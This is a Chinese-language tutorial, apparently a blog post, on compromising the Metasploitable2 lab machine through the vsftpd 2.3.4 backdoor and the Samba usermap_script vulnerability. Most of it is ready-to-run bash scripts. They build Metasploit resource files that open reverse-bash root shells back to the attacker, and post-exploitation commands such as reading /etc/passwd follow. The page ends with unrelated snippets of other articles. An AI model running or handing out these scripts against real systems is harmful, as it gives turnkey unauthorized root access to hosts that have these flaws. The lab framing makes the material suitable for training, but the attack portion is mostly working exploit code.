news 2026/1/12 1:13:56

Metasploitable2(192.168.1.4)渗透测试学习总结(vsftpd + Samba 漏洞)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Metasploitable2(192.168.1.4)渗透测试学习总结(vsftpd + Samba 漏洞)

适用场景:Kali Linux 环境,hexstrike-ai-master 虚拟环境,合法授权靶机 Metasploitable2核心思想:先拿稳定结果,再理解原理;复杂步骤自动化,一键搞定不踩坑

一、前期准备(必做环节,缺一不可)

1. 环境基础验证

  • 确认 Kali 与靶机互通:ping 192.168.1.4(能通才算正常)
  • 关闭 Kali 防火墙:ufw disable(避免拦截反向连接)
  • 激活 hexstrike 虚拟环境(可选,保证工具依赖):

    bash

    运行

    cd ~/hexstrike-ai-master source hexstrike-env/bin/activate
  • 安装必备工具:apt install nmap metasploit-framework -y

2. 信息收集(渗透第一步,先扫后打)

方法:HexStrike 核心逻辑脚本(复刻 AI 扫描)
  1. 创建扫描脚本hexstrike_scan.py

    python

    运行

    import subprocess import sys def hexstrike_ai_scan(target_ip): print(f"=== HexStrike AI 信息收集 - 目标:{target_ip} ===") nmap_cmd = f"nmap -sV -T4 -Pn -p 1-1000 {target_ip}" try: scan_result = subprocess.check_output(nmap_cmd, shell=True, stderr=subprocess.STDOUT, encoding="utf-8") print("扫描结果:\n", scan_result) print("\n【关键漏洞识别】") print("- 21端口 vsftpd 2.3.4:存在后门漏洞(CVE-2011-2523)") print("- 139/445端口 Samba 3.X:存在命令执行漏洞(CVE-2007-2447)") except Exception as e: print(f"扫描失败:{e}") if __name__ == "__main__": hexstrike_ai_scan("192.168.1.4")
  2. 运行脚本获取靶机信息:python3 hexstrike_scan.py
  3. 核心结果提取:记录开放端口和对应服务版本,确定可利用漏洞

二、漏洞利用核心方案:反向 Shell 一键脚本(新手免踩坑)

核心原理

反向 Shell 是靶机主动连接 Kali,无需手动抢时间输入指令,100% 稳定拿 root 权限,是渗透测试的标准操作,比交互 Shell 简单高效。

方案 1:vsftpd 2.3.4 后门漏洞一键脚本

步骤 1:创建脚本文件

bash

运行

nano vsftpd_root_shell.sh
步骤 2:粘贴脚本内容(全自动,零修改)

bash

运行

#!/bin/bash # vsftpd 2.3.4 后门漏洞一键获取 root shell # 自动提取 Kali 本机 IP(eth0 网卡) KALI_IP=$(ip addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | head -n1) # 生成 Metasploit 自动攻击脚本 cat > /tmp/vsftpd_auto.rc << EOF use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 192.168.1.4 set PAYLOAD cmd/unix/reverse_bash set LHOST $KALI_IP set LPORT 9999 set ExitOnSession false # 防止会话自动关闭 run EOF # 执行攻击 echo "=== 开始攻击 vsftpd 漏洞 ===" echo "Kali IP:$KALI_IP | 监听端口:9999" msfconsole -q -r /tmp/vsftpd_auto.rc # 清理临时文件 rm -f /tmp/vsftpd_auto.rc
步骤 3:赋予执行权限

bash

运行

chmod +x vsftpd_root_shell.sh
步骤 4:运行脚本(全程无手动操作)

bash

运行

./vsftpd_root_shell.sh
成功标志

终端出现Command shell session 1 opened,并弹出#提示符,输入whoami输出root即为成功。

后渗透操作(拿到 shell 后执行)

bash

运行

whoami # 查看当前用户(root) ls /root # 查看 root 目录文件 cat /etc/passwd # 查看靶机用户列表 exit # 退出 shell 会话

方案 2:Samba 3.X 命令执行漏洞一键脚本

步骤 1:创建脚本文件

bash

运行

nano samba_root_shell.sh
步骤 2:粘贴脚本内容

bash

运行

#!/bin/bash # Samba 漏洞(CVE-2007-2447)一键获取 root shell KALI_IP=$(ip addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | head -n1) cat > /tmp/samba_auto.rc << EOF use exploit/multi/samba/usermap_script set RHOSTS 192.168.1.4 set PAYLOAD cmd/unix/reverse_bash set LHOST $KALI_IP set LPORT 8888 set ExitOnSession false run EOF echo "=== 开始攻击 Samba 漏洞 ===" echo "Kali IP:$KALI_IP | 监听端口:8888" msfconsole -q -r /tmp/samba_auto.rc rm -f /tmp/samba_auto.rc
步骤 3:赋予权限并运行

bash

运行

chmod +x samba_root_shell.sh ./samba_root_shell.sh
成功标志

同 vsftpd 漏洞,终端弹出#提示符,whoami输出root

三、常见问题与排查(必记,避免踩坑)

问题现象排查方法
脚本运行后无会话建立1. 检查 Kali IP 是否正确(ip addr show eth0)2. 确认靶机 IP 是 192.168.1.43. 换监听端口(如 7777),避免端口冲突
端口被占用查看占用进程:`netstat -tulngrep 端口号<br>杀死进程:kill -9 进程号 `
靶机无法连接 Kali1. 关闭 Kali 防火墙(ufw disable)2. 确认 Kali 与靶机在同一网段
手动输入指令报错放弃手动输入,直接用反向 Shell 一键脚本,根本解决时机问题

四、核心知识点总结(复习重点)

  1. 渗透测试流程:信息收集 → 漏洞识别 → 漏洞利用 → 后渗透 → 清理痕迹
  2. 反向 Shell 优势:靶机主动连 Kali,无需手动交互,会话稳定,新手首选
  3. 脚本万能模板:自动查 IP → 生成 msf 脚本 → 一键运行 → 清理临时文件
  4. 关键注意事项
    • 仅在合法授权靶机操作,禁止攻击非授权设备
    • 每个漏洞用不同监听端口,避免冲突
    • 拿到 shell 后先执行whoami确认权限

五、进阶玩法(适合爱折腾的你)

  1. 脚本菜单整合:把 vsftpd、Samba 脚本整合到一个hack_menu.sh,运行后选数字攻击对应漏洞
  2. 日志记录功能:在脚本中添加>> hack.log,把攻击结果保存到日志文件,方便复习
  3. 多漏洞同时攻击:修改端口号,同时运行多个脚本,获取多个 root shell 会话
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2025/12/29 2:25:56

综合能源系统调度模型:低碳与灵活的双重探索

MATLAB代码&#xff1a;计及碳捕集电厂低碳特性及需求响应的综合能源系统多时间尺度调度模型 关键词&#xff1a;碳捕集电厂 综合灵活运行方式 需求响应 日前调度 实时调度 参考文档&#xff1a;《计及碳捕集电厂低碳特性的含风电电力系统源-荷多时间尺度调度方法》非完全复现&…

作者头像 李华
网站建设 2025/12/29 3:04:39

混合精度训练:TensorFlow中FP16加速实践

混合精度训练&#xff1a;TensorFlow中FP16加速实践 在当今深度学习模型动辄上百亿参数的背景下&#xff0c;训练效率和硬件资源利用率已成为制约AI项目落地的关键瓶颈。一个典型的ResNet-50模型在ImageNet上训练一次可能需要数十小时甚至数天&#xff0c;显存占用轻易突破16GB…

作者头像 李华
网站建设 2025/12/31 20:07:13

3步上手Gemini AI:JavaScript开发者的智能助手

3步上手Gemini AI&#xff1a;JavaScript开发者的智能助手 【免费下载链接】generative-ai-js The official Node.js / Typescript library for the Google Gemini API 项目地址: https://gitcode.com/gh_mirrors/ge/generative-ai-js Google AI Gemini JavaScript SDK …

作者头像 李华
网站建设 2026/1/11 12:03:14

深蓝汽车完成C轮融资,资金总额61.22亿元

12月25日&#xff0c;深蓝汽车正式宣布完成C轮融资&#xff0c;本轮融资金额达61.22亿元。本轮增资由长安汽车、重庆渝富控股集团有限公司、招银金融资产投资有限公司共同出资&#xff0c;为深蓝汽车后续发展注入强劲动能。据了解&#xff0c;深蓝汽车是长安汽车旗下的新能源汽…

作者头像 李华
网站建设 2026/1/11 12:03:13

MySQL binlog解析利器my2sql:从入门到精通完整指南

MySQL binlog解析利器my2sql&#xff1a;从入门到精通完整指南 【免费下载链接】my2sql 解析MySQL binlog &#xff0c;可以生成原始SQL、回滚SQL、去除主键的INSERT SQL等&#xff0c;也可以生成DML统计信息以及大事务分析信息。 项目地址: https://gitcode.com/gh_mirrors/…

作者头像 李华
网站建设 2026/1/10 15:06:52

AI语音治理与风险防控终极指南:构建负责任的技术应用完整策略

在人工智能语音技术迅猛发展的浪潮中&#xff0c;如何平衡技术创新与社会责任已成为政策制定者和技术管理者面临的核心挑战。AI语音治理与风险防控不仅关乎技术安全&#xff0c;更涉及个人隐私、社会信任和数字伦理的重塑。 【免费下载链接】parler-tts Inference and training…

作者头像 李华